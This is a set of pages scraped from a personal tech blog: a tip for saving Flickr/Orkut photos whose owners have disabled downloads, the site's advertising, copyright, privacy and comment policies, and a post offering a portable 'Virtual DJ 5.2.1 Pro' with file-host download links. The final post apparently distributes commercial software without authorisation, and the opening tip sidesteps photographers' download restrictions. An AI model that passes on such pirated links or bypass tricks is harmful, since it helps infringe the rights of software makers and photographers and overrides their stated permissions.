all you will see on the desktop is a blank 1x1 pixel placeholder image called spaceball.gif
Reason : When a Flickr or orkut member has set download permissions to disallow his/her photos from being downloaded, a transparent image is overlaid on the actual photo so the right-click method fails.
Solution : You may either use the good-old Print Screen / Screenshot or any of the methods below to defeat the Orkut image protection...
For Firefox: Go to Tools -> Page Info -> Media - Scroll down until you see that orkut image in the Media Preview Window. Click the Save As button.
See the Screenshot Below
In IE, Opera, Safari or Firefox: Right click the Flickr web page and chose "View HTML source" - now search for "spaceball.gif" in the HTML source. You'll find the full location of the protected image enclosed in the img src=" Link of Image "
Now find the Actual image Link and Download it.
You can also use this trick to Download images from other image protected sites.
Welcome to Advertising section of KILL-SYSTEM32.CO.CC, this page gives you a complete insight of advertising policy we follow here. Here we help our advertiser to get the maximum for the money they put into advertising.You can check all the links and explanation done and contact us for more.
- About
- Seo and Traffic Stats: PR ,Alexa, Technorati,Demographics Result.
- Who can advertise here ?
- How do I Get started on Advertising here?
- Advertising Policy ( Including change of policy system)
- Need more information? Contact Us
About KILL-SYSTEM32.CO.CC
KILL-SYSTEM32.CO.CC is targeted to audience who are interested in lea lerning technology and keep themselves update with quick news with complete in depth explanation. This includes Internet Geeks, tech heads, security interpretors. KILL-SYSTEM32.CO.CC covers a large explanation of geeky things which can be understood by anybody with a bit of tech idea. It involves :
- Discussion on Technology News.
- Reviews of upcoming hardware and software with in depth analysis.
- Explanation of new technology with images and videos.
SEO and Traffic Stats
- SEO: KILL-SYSTEM32.CO.CC has a page rank of 5 with Alexa ranking of 47,438. Its one of the fastest growing site as the alexa rank doubled in 2 months from 140,091. Technorati Rank is 9,671 which also has increased double in last 2 months
- Traffic:KILL-SYSTEM32.CO.CC generates 2.5K Page views and 2.0K unique unique visitors every month. 80% of traffic comes from Search Engines and its increasing everyday.
- Demographic: The major source of audience that come to KILL-SYSTEM32.CO.CC is from USA and Europe. Another major source are from Indonesia and India.
Who can advertise here ?
I am interested to get advertiser who fall in the same category as this blog does. This blog is all about technology, so if you have a technology related site feel free to use this scheme for advertising. I will not accept any site which has is not related or not suitable.
How do I Get started on Advertising here?
This is simple.Follow the Simple steps:-
- Choose a Advertising Scheme.
- Email me through the contact form by choosing “Book an advertising Scheme” as an option and complete details of yous site , your name and email. You need to give a complete detail of how long you want to run the scheme.
- Your request is verified and if you are eligible, a reply to your email is sent back.
- Depending on the scheme, you need to reply back with required images ( in case of banner ad) and payment made at the requested paypal address.
- After the receipt of payment, you ads stars running and you will receive an email which will contain the start date and end date of your chosen advertising scheme.
- When the advertising scheme expires, the ads will be removed and given to some other advertiser if you have not booked the same scheme in well advance.
Advertising Policy ( Including change of policy system)
KILL-SYSTEM32.CO.CC holds the final decision of deciding the advertisers and running your advertisement on this site. Your ads will run without any problems unless:-
- You have made a false impression of your site.
- If you have cheated to fit into the category.
- Your advertising scheme has expired and you have not made any advance booking.
If you fall in any of the above mentioned clause, your advertising scheme will be discontinued and no repayment will be made.
There is no case where you have made the payment and want it back. Your ads will run without any problems for the chosen duration of time and removed after that. Please make a final decision before you book an advertising scheme.
Change of Policy: This means if there is any change in pricing or scheme your current running scheme will not be affected but any further booking will fall into the new scheme.
Need more information? Contact Me.
If the above explanation is not clear, you can still contact me for further explanation. We can sit and talk through email and clear your doubts and any confusion you have. You can contact me through My No 9821776537 by choosing “Query on advertising” in the “Required Reason” option. I hope to see you responding and We will do best so you get benefited in return. Thanks.!!
If you are interested in linking, quoting, or reprinting articles from KILL-SYSTEM32 in whole or in part, please do read our copyright policy:
How to link to KILL-SYSTEM32 ?
You can create a post with short note of the article which you want to link with giving credit to Author and the post with complete URL. Please do not just hyper link to home page. Moreover the short note should be more than a paragraph.
How to re-print content to Off line or Print Media ?
If you are publishing a Magazine or Newspaper and Interested to re print my article, you are welcome to do so but you will have to provide the Authors Name, The Site name and Complete URL of the article.
How to re-print content to Online Print Media
This is not a very good idea but if you feel to do so please contact me with your request. They can be re-printed only after proper approval from the author and in this cases the authors have to be paid. For further details use our contact page.
What will happen when you copy the content without permission?
- Every hosting service follow Copyright act which means any site hosted on their site are not allowed to copy or infringe anything from others without prior permission. So if you do, you r hosting will be informed and your sight will be suspended. I have done it twice before and I will do it again.
- Google follows something for copyright protection called as DMCA ( Digital Millennium Copyright Act). Acting on which can not only get your site banned but also out of Google index. You will not be able to get any visitors from anywhere.
- The rest I will do is call upon every bloggerI know and let them know about it.
So best is don’t copy else you will face a situation from where you will have no go other than to ban the site yourself.
Disclaimer about the Name:KILL-DRIVER32 is just a mere abbreviation of Technology Spot or a pool of technical stuff.It has nothing to do with any persons or companies name.
Disclaimer about the Content:
This Blog is Just posts of personal experience of what i have learned and experienced.It was nothing to do with anybody else.Whatever i have written or i am going to write could work in some case and might not hold true in others.So i would like to say that all i am writing is for the benefit of the readers and if theres any issues do write back to me and i will try to fix it if possible but I dont hold any responsibility in case something goes wrong with your machine or you.
Disclaimer about the logo:
This logo had been designed by me on Saturday,May 09 2009 and is not copied from any site or company or related ot a person.If it is so is a major co-incidence.
There are number of ways you can subscribe to KILL-SYSTEM32.co.cc to get news at your doorstep!( emails,newsletter and feeds are the new generation doorstep).You can choose as per your continence.
How to subscribe through Feeds?
For even who don’t know,
A web feed is a data format used for serving users frequently updated content. Content distributors syndicate a web feed, thereby allowing users to subscribe to it. Making a collection of web feeds accessible in one spot is known as aggregation.( via wikipedia)
Means You can add to your My Yahoo or My Google Home pages and read it when you visit there or through your favorite reader. Click here Find your list
How to make an Email Subscription ?
Very Busy for a feed ? Here is your answer that is most popularly used by readers all over the world to get everything in your mailbox.You can subscribe giving your email address below(It wont be used for any other purpose i can promise that) and get my posts instantly when i post it.Easy Isn’t it.
I am using third party tool for that and even they will never use it for other purpose.You can just click on the image you see below and enter your email address.You will receive an email from feedburner asking for your confirmation.As soon as you click on the link, your email subscription is ready to roll.Every time i make a new post you will receive an email contain that post.Thus making is simpler for you to keep yourself updated.Try it.
Subscribe to Podcast
Whats The Idea behind KILL-SYSTEM32.co.cc
This site is an effort to make the life of normal users to understand on how to use their CP or computer and Safe. We also aim towards improving the way you should browse isafely keeping you away from the phishing and electronic threats.
We write articles here in a very simple manner with examples , images and even videos so you get it right. This is just a starting of a future vision i have. So even if you are a normal non technical person but you will have a question “How does this fan works?”. Don’t You?
Here at kill-system32.co.cc We just don’t believe in just news.I would rather give you analysis and review so even you get to know whats good for you and what you can use more effective.
This site is free enough to answer or accept any question or comments you have.Do not hesitate to ask, because if you ask we all will learn.
How to find more information here ?
The following things you should do to keep yourself updated with us
I am running subscription for this blog.So if you like this : Subscribe Here
Want to Advertise ? Read more on out Advertise Page
Disclaimer | Copyright | Privacy Policy
KILL-SYSTEM32.co.cc value our readers and visitors privacy. However for maintaining statics and keeping away spammers we do need to collect and preserve small piece of information of people who visit our site.
Privacy Policy:
- We use analytical tool such as Google Analytics, 103bees to understand where our customers and visitors are coming from. In this we collect information such as IP Addresses and Operating system used. However these data are not shared with a third party and strictly kept for increasing the performance of website.
- The site is hosted at asmallorange.com ( hosting company) but no data is shared with them either.
- The site uses a blogging software called as WordPress which stores a small amount of information in users computer when he or she comments. This is of very small size and no way is a malware or script which hacks a computer for information.
- You are free to read and utilize the resource available here but now allowed to copy the content. Read more on our Copyright Policy.
- We use third-party advertising companies to serve ads when you visit our Web site. These companies may use information (not including your name, address email address or telephone number) about your visits to this and other Web sites in order to provide advertisements about goods and services of interest to you. Users may out out of the use of the DART cookie by visiting the Google ad and content network privacy policy.
Comment Policy:
“Commenting a weblog or any site is one of the major responsibility on the side of reader as its same as telling something about a person or something in public….It Leaves A Major Impact. ”
Comments are means of telling somebody what he or she did but at the same time misusage can be high.Its like how you say it.If you find a problem you can say its wrong with proper reasons but nobody should or have a right to make the person feel miserable.
Blogger community is growing faster than anything on internet.Professional Blogging has become a signature of many persons as well companies.They have created a respect for each other,Dont dis-respect it.
We are open to all kinds of comment a reader want to make till he is not dis-respecting a post or page.This blog or anyblog is trying to teach community to learn from each other so suggest tell but be nice.However i would like to tell my readers what i think:
- I love comments on this blog - Feel Free to say.It does not matter to me whether you know about the post or not but u might have your own point of view.Your welcome always…and we can learn from my mistakes too.
- No Spams Please - Please don’t spam.We delete them so the post looks much cleaner.
- Spawner - You are welcome to put signatures on the comment like if you find similar articles or a better one do leave it…
- Signatures - We don’t mind having links on the comment but make sure its relevant to your post and help other readers to learn more.Please don’t use it for advertising your blogs.
“My advice to those commenting on blogs (not just mine) is that in a sense you are visiting someone else’s home when you leave a comment. Comments have the ability to build up our tear down your reputation. They are a permanent record of who you are and what you stand for - so take care - be gracious - make sure they add value (not only to the blog you are visiting but also to your own online profile). “
Virtual DJ 5.2.1 Pro MultiLang (Portable)
Atomix Virtual DJ is the MP3 mixing software that targets every DJ from bedroom DJs to professional superstars such as Carl Cox, and is used everyday by millions of DJs, and in many big clubs. It features a breakthrough BeatLock engine that will keep your songs in tune and let you work your mixes incredibly faster than any other DJ. The automatic seamless loop engine and the new synchronized sampler will let you perform astounding remixes on the fly. VirtualDJ is compatible with timecoded vinyls that let you scratch your MP3s directly on a real turntable, and with many other DJ equipment. VirtualDJ will also let you mix and scratch music videos right from your turntables. You can use several interfaces to suit both beginners and professionals, record your mixes and burn them on CD, rip DVD, rip vinyl, create your own Internet radio, automatically mix playlists, use VST effects, display karaoke, and play DRMed file like Yahoo!
Features:
• Twin independent zero-latency players with:
• Standard controls (play, pause, stop, cue)
• Volume control
• Pitch control (from -34 to +34%)
• 3 band equalizers with Kill + gain
• One-click beat matching and synchronisation (new FAME algorithm)
• BeatLock engine: your songs will always stay in time, and you can work your mixes incredibly faster than any other DJ could
• Automatic beat-matched crossfading
• On-the-fly automatic BPM calculation
• Automatic pitch matching
• Automatic level matching
• Automatic beat matching
• Dynamic beat visualizer for easy "drag'n'drop" beat-matching
• Real scratch simulation
• Virtual scratch: Scratch your mp3 with your bare hand
• Automatic beat-aware LOOP function
• Synchronised sampler with 12 instant slots
• Master Tempo pitch algorithm
• Automatic first beat and last beat detection
• Automatic 4/4 phase detection
• OSC network synchronisation
• Infinite number of beatlocked desks (local multi-instance or network)
• Infinite number of cue points saved per songs
• Beat-aware effect plugins (included: beatgrid, flippin, vocal remover, filter, flanger, backspin, brake, etc...)
• VST effects compatibility
• Video mix with TV output (mix songs and/or video clips !)
• Full karaoke support
• Proprietary of FreeFrame video effects
• Inifite number of video effect simultaneously
• DJ-adapted video transition plugins
• Song database engine with easy-to-use search feature
• CoverFlow or text-only song browsing
• Compatible with iTunes playlists
• ID3 compatibility
• Automatic "filter" folders
• Automatic Hot-Swap of external harddrives
• Ready-to-burn file recording to burn your own mixed CDs
• Broadcast on the Internet
• CD to MP3 encoder
• Optional 3D sound card, 2 sound cards or Y-splitter for real-time monitoring or external mixtable use
• ASIO soundcard compatibility
• Fully customisable (skin engine and shortcut macro enngine)
• External MIDI keyboard compatibility for shortcuts
• Compatibility with most external controllers (DMC2, DAC3, iCDX, TotalControl, BCD2000, DJConsole, etc...)
• Optional automatic mixing: Virtual DJ recognizes the style of the music (techno, hip hop, lounge) and adapt its mix in consequence
Extract (with a PortableApps folder at the device's root) and run VirtualDJPortable.
Language fixed by launcher according SystemLang: English, French, German, Italian, Spanish.
Settings of installed VirtualDJ should be preserved.
Size : 12.7 MB
Rapidshare Account :
http://rapidshare.com/files/223560888/VirtualDJ_Portable_5.2.1_MultiLang.rar
Uploading Account :
http://uploading.com/files/CS0Q8EBI/VirtualDJ_Portable_5.2.1_MultiLang.rar.html
Easy Share Account :
http://www.easy-share.com/1904647904/VirtualDJ_Portable_5.2.1_MultiLang.rar
Uploaded To Account :
http://ul.to/vfjgnm